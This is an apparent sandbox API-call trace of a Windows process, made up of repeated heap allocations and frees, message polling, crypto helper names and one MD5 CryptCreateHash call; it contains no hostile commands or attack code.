PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.656] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0134.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0134.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0134.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0134.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0134.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0134.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0134.658] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0134.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.658] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0134.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0134.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0134.658] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0134.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0134.658] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.659] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0134.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0134.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0134.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0134.659] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0134.659] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0134.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0134.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0134.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0134.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0134.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.662] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.662] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0134.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0134.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0134.662] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.662] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0134.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0134.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0134.662] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0134.662] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0134.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0134.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.662] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.662] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0134.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.662] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0134.663] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.663] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0134.663] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0134.663] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0134.663] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0134.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0134.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0134.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0134.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50ae8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0134.664] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0134.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0134.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0134.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0134.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0134.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0134.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0134.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0134.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0134.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0134.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0134.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0134.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0134.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0134.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0134.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0134.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 